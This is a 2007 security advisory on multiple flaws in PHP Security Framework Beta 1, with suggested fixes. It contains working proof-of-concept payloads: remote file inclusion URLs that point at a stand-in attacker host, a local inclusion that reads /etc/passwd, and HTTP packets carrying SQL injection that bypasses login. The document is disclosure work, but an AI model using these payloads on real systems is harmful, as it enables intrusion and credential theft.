phpsf-multi.txt

` Title: PHP Security Framework (Beta 1)  
Multiple Vulnerabilities and Security Bypass  
  
Vendor: http://benjilenoob.66ghz.com/projects/  
  
Advisory: http://acid-root.new.fr/?0:16  
Author: DarkFig < gmdarkfig (at) gmail (dot) com >  
  
Released on: 2007/12/16  
Changelog: 2007/12/16  
  
Summary: [HT] Remote File Inclusion  
[MT] SQL Injection  
[MT] SQL Injection Protection Bypass  
[__] Conclusion  
  
Legend: L - Low risk M - Medium risk  
H - High risk T - Tested  
  
Risk level: High  
CVE: ----------  
  
  
  
I - REMOTE FILE INCLUSION  
  
The file "lib/base.inc.php" contains the following code:  
  
10| include_once("$MODEL_DIR/FrameworkPage.class.php");  
15| include_once("$COMMON_DIR/adodb/adodb-active-record.inc.php");  
26| include_once("$DAO_DIR/Administrator.class.php");  
35| include_once("$LOGIC_DIR/AdministratorLogic.class.php");  
  
As you can see, all variables aren't sanatized before  
being used. So this can lead to RFI if the php directives  
allow_url_fopen and allow_url_include are set to On. This  
can also lead to LFI if the php directive magic_quotes_gpc  
is set to Off.  
  
Proof Of Concept:  
http://localhost/PSF/lib/base.inc.php?MODEL_DIR=http://hacker.com/  
http://localhost/PSF/lib/base.inc.php?DAO_DIR=/etc/passwd%00  
  
The author shouldn't use variables for the inclusions, the  
best way to protect against this type of vulnerability is  
to use constants because they can't be registered by  
register_globals if they're properly defined (no variables  
used).  
  
  
  
II - SQL INJECTION  
  
The script supports several server databases, Oracle  
included. So the script must also be secured for this type  
of server database.  
  
In a recent research that I have done, I found that  
60% of the PHP scripts which support Oracle aren't safe !  
People think that if they use the function addslashes()  
on a string which has quotes, they'll be secured  
against SQL Injection. On MySQL that's roughly true, but  
on Oracle that's wrong.  
  
The escape character for MySQL is a backslashes, \x92[\].  
The escape character for Oracle is a single quote, \x39['].  
  
The script has a user interface for the administrators.  
The file "lib/control/AuthentificationController.class.php"  
contains the following code:  
  
4| public function __construct()  
5| {  
6| $FrameworkPage = FrameworkPage::getInstance();  
7| $FrameworkPage->setHeadTitle("Authenfication Form");  
8| $FrameworkPage->setPageTitle("PHPSecurityFramework");  
9|   
10| if(isset($_REQUEST['username']) && isset($_REQUEST['password']))  
11| $this->Login($_REQUEST['username'], $_REQUEST['password']);  
12| }  
13|   
14| public function Login($username, $password)  
15| {  
16| $username = addslashes($username);  
17| $password = md5($password);  
18| $AdministratorLogic = new AdministratorLogic();  
19|   
20| if($AdministratorLogic->validateAdministrator($username,$password))  
22| session_register('psf_admin');  
  
The function addslashes() is applied to $username, after  
the function valideAdministrator() is called with two  
parameters. This function contains the following code:  
  
10| public function validateAdministrator($username, $password)  
11| {  
12| if(is_string($username) && is_string($password))  
13| {  
14| $Admin = new Administrator();  
15|   
16| if( ($Admin->load("username=?", array($username))) !==false)  
17| {  
18| if($Admin->md5password==$password)  
19| return true;  
  
The code for the Administrator class is situated in the  
file "lib/dao/Administrator.class.php":  
  
2| class Administrator extends ADOdb_Active_Record  
3| {  
4| public $_table = 'psf_administrator';  
5| }  
  
The function load() contains this code (situated in  
"lib/common/adodb/adodb-active-record.inc.php"):  
  
384| function Load($where,$bindarr=false)  
385| {  
386| $db =& $this->DB(); if (!$db) return false;  
387| $this->_where = $where;  
388|   
389| $save = $db->SetFetchMode(ADODB_FETCH_NUM);  
390| $row = $db->GetRow("select * from ".$this->_table.' WHERE '.$where,$bindarr);  
391| $db->SetFetchMode($save);  
392|   
393| return $this->Set($row);  
394| }  
  
I will take an example to explain how it works.  
Let's send this HTTP packet:  
  
POST /PSF/index.php?page=authentification HTTP/1.1\r\n  
Host: localhost\r\n  
Connection: keep-alive\r\n  
Content-Type: application/x-www-form-urlencoded\r\n  
Content-Length: 66\r\n\r\n  
username=root%27&password=toor&page=authentification&button=Log+in\r\n\r\n  
  
The SQL request will be like this:  
select * from psf_administrator WHERE username='root\\\\\\\\\\\\\\\''  
  
If we're on MySQL there's no problem, but if we're on  
Oracle, this return an error: ORA-01756: quoted string  
not properly terminated. This can be exploited, for   
example if you want to bypass the authentification  
protection, send the following HTTP packet:  
  
POST /PSF/index.php?page=authentification HTTP/1.1\r\n  
Host: localhost\r\n  
Connection: keep-alive\r\n  
Content-Type: application/x-www-form-urlencoded\r\n  
Content-Length: <SIZE>\r\n\r\n  
username=8%27+union+select+CHR%2856%29%2CCHR%2857%29%2CCHR%2857%29  
%2CCHR%2857%29+FROM+psf_administrator-----------&password=9&page=a  
uthentification&button=Log+in\r\n\r\n  
  
The SQL request will look's like this:  
select * from psf_administrator WHERE username='8\\\\\\\\\\\\\\\'  
union select CHR(56),CHR(57),CHR(57),CHR(57) FROM psf_administr  
ator-----------'  
  
So the function validateAdministrator() will return TRUE.  
The protection will be bypassed, even if magic_quotes_gpc  
is enabled. To protect against SQL Injection with quotes  
on Oracle servers, we must replace each ' by ''. We can  
do that with str_replace() or by enabling the PHP  
directive magic_quotes_sybase.  
  
  
  
III - SQL INJECTION PROTECTION BYPASS  
  
From the file "lib/common/SecureHttpRequest.class.php":  
  
94| * Function: PreventFromSqlInjection()  
95| * $param: $string_to_parse  
96| *   
97| * This function prevent from some sql injection that does  
98| * not require any quote.  
99| * Exemple: index.php?id=1 UNION SELECT user, password ...  
100| *   
101| * It will return a secure string.  
  
By seeing this comment and how the function is called, I  
know that they'll be a filter against SQL Injections.  
Let's see how the string is secured:  
  
105| if(is_string($string_to_parse) and !empty($string_to_parse))  
106| {  
111| $keywords =  
| array('UNION','OUTFILE','DUMPFILE','ORDER','SELECT');  
|  
112| foreach($keywords as $keyword)  
|  
113| $string_to_parse =  
| str_replace($keyword, "_$keyword", $string_to_parse);  
114|   
115| return $string_to_parse;  
116| }  
  
The str_replace() function is case sensitive, so we can  
bypass this protection by using SQL commands with lower  
case. In other case the attacker doesn't need these commands  
to perform an SQL Injection attack, a filter protection  
can't protect completely against this type of attack.  
Let's take the example from the file "examples/noQuoteSql  
Injection.test.php":  
  
1| Try some UNION and co stuff to display the administrator  
| password in the client table  
2| <hr>  
3| <?php  
|  
4| // SELECT title, message FROM news WHERE news.id = 1 UNION  
| SELECT username, password FROM client WHERE client.id = 1  
| INTO OUTFILE 'c:/hacked.txt'  
|  
5| include_once("../PHPSecFramework/getsecure.php");  
|  
6| mysql_connect('localhost', 'root', 'vertrigo');  
7| mysql_select_db('hackme');  
|  
8| $query = mysql_query("SELECT title, message FROM news WHERE  
| news.id = " . $_GET['id']);  
|  
9| $result = mysql_fetch_array($query);  
10| print_r($result);  
11| ?>  
  
What if we try to send this content:  
?id=-1 union select username,password from client limit 1  
  
The protection is bypassed and the SQL Injection is  
exploited. If the author wanna apply his filter  
completely, he must use the function str_ireplace().  
  
  
  
IV - CONCLUSION  
  
The goal of the project is interesting, but how it was  
made, can't conduct to its success. For example,  
SQL Injections with quotes are protected by doing the  
same thing as magic_quotes_gpc, this didn't resolve its  
problems.  
  
Before doing something which depends on what the user  
has sent, we must analyze all data before using them.  
  
Applying a filter won't be enough, we must code  
an algorithm which protects perfectly against each type  
of attack, even if we have to replace basic functions.  
  
I hope this advisory will change the way this project  
is going on.  
`